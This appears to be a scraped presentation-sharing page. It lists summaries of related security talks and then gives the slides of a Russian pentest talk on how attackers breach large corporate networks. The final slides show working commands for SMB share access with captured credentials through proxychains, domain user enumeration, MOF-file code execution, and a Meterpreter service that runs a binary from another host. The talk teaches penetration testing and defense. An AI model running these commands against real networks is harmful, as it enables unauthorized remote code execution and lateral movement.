В современном бизнесе все решает время. Доступность корпоративных приложений из любой точки земного шара и с любых мобильных устройств - это и есть облик современного бизнеса. Но как обеспечить подобную доступность? VPN-шлюзы? Доставка приложений через веб-сервисы? Каждая компания свободна в выборе любого из решений. Но насколько безопасны эти решения? В презентации затронута практическая безопасность при организации удаленного доступа к приложениям с использованием решений самых популярных брендов в этой сфере.
Анализ защищенности Web-приложений, выявление уязвимостей в реальных условияхDmitry Evteev
Уязвимости и атаки на Web-приложения, общепринятые классификации уязвимостей. Ошибки, допускаемые разработчиками при создании клиентской и серверной частей Web-приложения, их возможные последствия и методы выявления и устранения. Примеры из практики. Обзор специализированных средств защиты Web-приложений: Web Application Firewall (WAF). Стоит ли полагаться на WAF?
Методология выявления уязвимостей в Web-приложениях, в частности, с использованием различных средств автоматического анализа.
Ведущий: Эльдар Бейбутов
Интернет приложения - это интерфейс взаимодействия человеческого сознания с информационной системой. Процесс коммуникации людей и машинного кода не поддается формализации, невозможно учесть все возможные состояния системы в ручную, для этого необходимы интеллектуальные средства защиты, которые будут способны к самостоятельному обучению и принятию решений на основе многофакторных моделей. На докладе поговорим о эвристических механизмах обнаружения атак, автоматическом создании позитивной модели и поведенческом анализе.
Ведущий: Владимир Иванов и Сергей Гордейчик
Эксперт ИТ и исследователь кибербезопасности поделятся своим взглядом на проблему современных целевых атак, спонсируемых государствами и криминальными группировками. Докладчики расскажут об эффективности существующих подходов к защите, о способах обхода песочницы, и о том, пора ли IDS и AV отправляться на свалку.
Системы класса SIEM могут быть вполне применимы не только для информационной безопасности, но и ИТ персоналом, разработчиками для своевременного обнаружения и предотвращения инцидентов
This document summarizes a SIEM product called RuSIEM. It describes RuSIEM's team and technology, how the product works, its components, data scaling abilities, and performance capabilities. The document also outlines how RuSIEM differs from other SIEM solutions and provides details on installations, correlations, receiving and sending events, analytics, and the product's current status and 2017 roadmap.
The document summarizes an OSINT meetup discussing open-source intelligence (OSINT) and the Recon-ng tool. The meetup agenda included an introduction to OSINT and Recon-ng, a demonstration of the tool's modules and capabilities through test cases, and a special thanks to the creators of Recon-ng. The document promoted freely collecting intelligence from public sources and using tools like Recon-ng to conduct passive reconnaissance and vulnerability hunting.
Сканирование уязвимостей со вкусом Яндекса. Тарас Иващенко, Яндексyaevents
Тарас Иващенко, Яндекс
Администратор информационной безопасности в Яндексе. Специалист по информационной безопасности, проповедник свободного программного обеспечения, автор Termite, xCobra и участник проекта W3AF.
Тема доклада
Сканирование уязвимостей со вкусом Яндекса.
Тезисы
В докладе будет рассказано о внедрении в Яндексе сканирования сервисов на уязвимости как одного из контроля безопасности в рамках SDLC (Secure Development Life Cycle). Речь пойдет о сканировании уязвимостей на этапе тестирования сервисов, а также о сканировании сервисов, находящихся в промышленной эксплуатации. Мы рассмотрим проблемы, с которыми столкнулись, и объясним, почему в качестве основного механизма решили выбрать открытое программное обеспечение (сканер уязвимостей w3af), доработанное под наши нужды.
- Out of box: базовые настройки современных роутеров?
- Почему на коробке написано 300Mb/s а реальная скорость около 140Mb/s?
- Сколько роутеру нужно антенн?
- Несколько способов борьбы с соседями;
- Шифрование, скрывать имя сети или нет?
The document summarizes typical vulnerabilities found in e-banking systems by examining vulnerabilities in a demo remote banking system called PHDays I-Bank. Some vulnerabilities discussed include predictable user identifiers, weak password policies allowing short or dictionary passwords, methods for bypassing account locking and CAPTCHAs, weak password recovery processes, low entropy session identifiers and one-time passwords, and ways to conduct transactions without OTP validation. The document aims to demonstrate how such vulnerabilities could allow unauthorized access to accounts or denial of service attacks on real banking systems.
Тандемные DDoS-атаки / Проблематика уязвимостей в спецификации TCP/IP (фундам...HLL
Презентация к докладу Артёма Гавриченкова (ximaera), ведущего разработчика сети фильтрации трафика Qrator, для конференции HighLoad++ (25-26 октября 2010, Москва).
В данном докладе описывается потенциальная тандемная атака, включающая в себя одновременно SYN flood и одну из атак на FIN-WAIT-2 или Sockstress.
Широко известная атака на отказ в обслуживании протокола TCP — SYN Flood — хорошо изучена, существуют популярные методы борьбы с ней, включая, например, технологию SYN cookies [1]. Важным свойством этого вида атак является их влияние на модули отслеживания соединений (connection tracking). Даже при использовании SYN cookies каждый входящий TCP-сегмент с выставленным флагом SYN создаёт запись в базе отслеживаемых соединений, что спустя некоторое время может привести к переполнению базы и потере новых запросов на соединения.
Менее известная атака, носящая кодовое название FIN-WAIT-2 attack, эксплуатирует особенности алгоритма закрытия TCP-соединения. Данная атака подробно разбирается в CPNI Technical Note 3/2009: Security Assessment of the Transmission Control Protocol. Её основная цель — исчерпание памяти, используемой TCP-соединениями, находящимися в фазе FIN-WAIT-2 закрытия соединения. При определённых условиях соединение может находиться в этом состоянии продолжительное время, при этом все ресурсы, задействованные соединением, не будут доступны активным компонентам атакуемой системы.
1. Dave Dittrich, Some TCP/IP Vulnerabilities: Weaknesses, attack tools, defenses [HTML] (http://staff.washington.edu/dittrich/talks/agora/index.html).
Сетевая безопасность устройствами нового поколения NGFW и защита рабочих станций и серверов защитой от эксплойтов нового поколения в ЦОД и на периметре
Использование Web Application Firewall вызвано желанием снизить существующие угрозы со стороны атак, направленных на эксплуатацию уязвимостей в Web-приложениях. Однако, как и все созданное человек, WAF имеет недостатки, которые позволяют воспользоваться уязвимостями даже на самых защищенных серверах…
Новая Cisco ASA: тотальный контроль над пользователемSkillFactory
Эксперт школы SkillFactory, специалист в области информационной безопасности Сергей Кучеренко – о том, как использовать новую версию ПО Cisco ASA для решения актуальных задач и уверенно ориентироваться в функциях всей линейки Cisco ASA.
Tyurin Alexey - NTLM. Part 1. Pass-the-HashDefconRussia
Мы поговорим о NTLM, SSO- аутентификации и об эксплуатации pass-the-hash техники. Плюс обсудим методы защиты, которые пришли к нам с новейшими версиями ОС.
I.Kukalo - "Creating UTM System" on Microsoft congference in TPUguestc6d031
Unified threat management (UTM) is used to describe network firewalls that have many features in one box, including e-mail spam filtering, anti-virus capability, an intrusion detection (or prevention) system (IDS or IPS), and World Wide Web content filtering, along with the traditional activities of a firewall. Main goal of this research is to create own open-source based UTM system, that has almost all capabilities as their commercial analogs.
Similar to Истории из жизни. Как взламывают сети крупных организаций. (20)
РусКрипто CTF 2010 Full Disclosure (мастер класс)Dmitry Evteev
В презентации рассмотрены следующие вопросы:
- технические и организационные подробности подготовки и проведения РусКрипто CTF 2010
- заложенные уязвимости, пути их обнаружения и эксплуатации
- хронология событий на РусКрипто CTF 2010 и не найденные игроками уязвимости
Развитие систем анализа защищенности. Взгляд в будущее!Dmitry Evteev
Системы анализа защищенности являются удобным и простым инструментом, помогающим своевременно обнаруживать уязвимости в информационных системах. Они прошли долгий путь от утилит из набора "для хакера" до систем обеспечения информационной безопасности в инфраструктуре любой сложности. Как все было на самом деле, что мы имеем сейчас и что нас ждет в будущем? Именно об этом и пойдет речь в этом выступлении.
В презентации рассмотрены следующие вопросы:
- технические и организационные подробности подготовки и проведения РусКрипто CTF 2010
- заложенные уязвимости, пути их обнаружения и эксплуатации
- хронология событий на РусКрипто CTF 2010 и не найденные игроками уязвимости
Penetration testing involves assessing an organization's security processes and vulnerabilities by simulating real-world attacks. This is done through methodologies like OSSTMM and standards like CIS guides and ISO 2700x. The goals are to estimate security, gain unauthorized access to systems, and access certain information/data. Approaches include perimeter, wireless, and internal testing from user workstations or network segments. Real attacks aim to hack, while penetration testing is legal and aims to help organizations. Common tools used include Nmap, Metasploit, Cain & Abel, Aircrack, and browser/notepad. Examples demonstrated password cracking, SQL injection exploitation, and privilege escalation in Active Directory. Wireless, social engineering,
Истории из жизни. Как взламывают сети крупных организаций.
1. Истории из жизни. Как взламывают
сети крупных организаций.
Дмитрий Евтеев
2. Что такое крупная сеть?
- информационная система, в которой > 1.000 пользователей
Архитектура крупной сети предполагает:
• Централизованное управление
• Единый источник идентификаторов
• Единая точка аутентификации и авторизации
• Территориальная распределенность
Введение
3. Веб-приложения
Интерфейсы администрирования
…и прочий «зоопарк»
DNS, интерфейсы обработки электронных сообщений, FTP,
интерфейсы СУБД, LDAP, VPN/IPSEC, Netbios/SMB, Proxy/Socks, SNMP,
NTP…
Что содержится на периметре
4. Телеком
На большом количестве сетевых устройств, найдутся такие, где
используются дефолты.
Промышленность
На большом количестве идентификаторов пользователей, найдутся
такие, которые используют слабые пароли к удаленному перебору.
Интересные наблюдения (по отрасли)
5. Госсектор
Неоправданно высокое внимание к отдельным направлениям
обеспечения ИБ, наравне с отсутствием внимания к ИБ в целом.
Финансовый сектор
Пристальное внимание только к системам, обрабатывающим данные
держателей пластиковых карт, позволяет использовать уязвимости в
смежных системах.
Интересные наблюдения (по отрасли)
7. Основные этапы проведения атаки
Выявление целей и сбор данных об объектах
исследования
Сокрытиеследов
Поиск и эксплуатация уязвимостей
Сбор данных с новым уровнем доступа
Повышение привилегий
Сбор данных с новым уровнем доступа
Развитие атаки с имеющимися привилегиями
Закрепление своего присутствия
8. Соблюдение законов
Например: низя читать электронную пошту
Ограниченное время
Минимизация воздействия
Например: низя «убивать» аверов
Отчетность
Иногда требуется протокол всех совершаемых действий…
помимо пятисот страничного технического отчета
Оговорка по пентестам
9. Nmap, Nessus, etc.
Rapid7 Metasploit Framework
Immunity CANVAS
CORE Impact
SAINTexploit
Другие источники:
• public eq exploit-db.com
• private …
Поиск и эксплуатация уязвимостей
49. ~# proxychains smbclient -U DNPRODUCTIE/admin%any //192.168.1.1/C$
ProxyChains-3.1 (http://proxychains.sf.net)|S-chain|-<>-127.0.0.1:4532-<><>-
192.168.1.1:445-<><>-OK
Domain=[DNPRODUCTIE] OS=[Windows Server 2003 3790 Service Pack 2]
Server=[Windows Server 2003 5.2]
smb: > ls
AUTOEXEC.BAT A 0 Mon Jan 28 10:20:37 2013
boot.ini AHS 213 Mon Jan 28 09:53:27 2013
...
~# proxychains smbclient -U DNPRODUCTIE/admin%any //192.168.1.2/C$
~# proxychains net rpc user -U"DNPRODUCTIE/admin"%"any" -S 192.168.1.1
ProxyChains-3.1 (http://proxychains.sf.net)|DNS-response|: bt is not exist|S-chain|-
<>-127.0.0.1:4532-<><>-192.168.1.1:445-<><>-OK
admin
IUSR_WAD
IWAM_WAD
krbtgt
...
Owned in 60 seconds with ZackAttack (5/7)
50. exec over winmgmt
~/mof# proxychains smbclient -U"WGW/ADMIN"%"any" //192.168.1.1/ADMIN$
ProxyChains-3.1 (http://proxychains.sf.net) |S-chain|-<>-127.0.0.1:4532-<><>-
192.168.1.1:445-<><>-OK
Domain=[DNPRODUCTIE] OS=[Windows Server 2003 3790 Service Pack 2]
Server=[Windows Server 2003 5.2]
smb: > cd system32/wbem/mof
smb: system32wbemmof> put q.mof
putting file q.mof as system32wbemmofq.mof (1173.8 kb/s) (average 1173.8
kb/s)
smb: system32wbemmof>
респект Вячеславу Егошину @vegoshin
Owned in 60 seconds with ZackAttack (6/7)
51. exec over metsvc
~# proxychains net rpc service create meterpreter meterpreter
"192.168.1.5testmetsvc.exe service" -U"WGW/ADMIN"%"any" -S 192.168.1.1
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:4532-<><>-192.168.1.1:445-<><>-OK
Successfully created Service: meterpreter
~# proxychains net rpc service start meterpreter -U"WGW/ADMIN"%"any" -S
192.168.1.1
Owned in 60 seconds with ZackAttack (7/7)
52. Реализация успешного сценария атаки – это как
правило использование больше одной уязвимости
Чем больше по размеру информационная система, тем
больше возможных путей для реализации атак
Вместо заключения: простые истины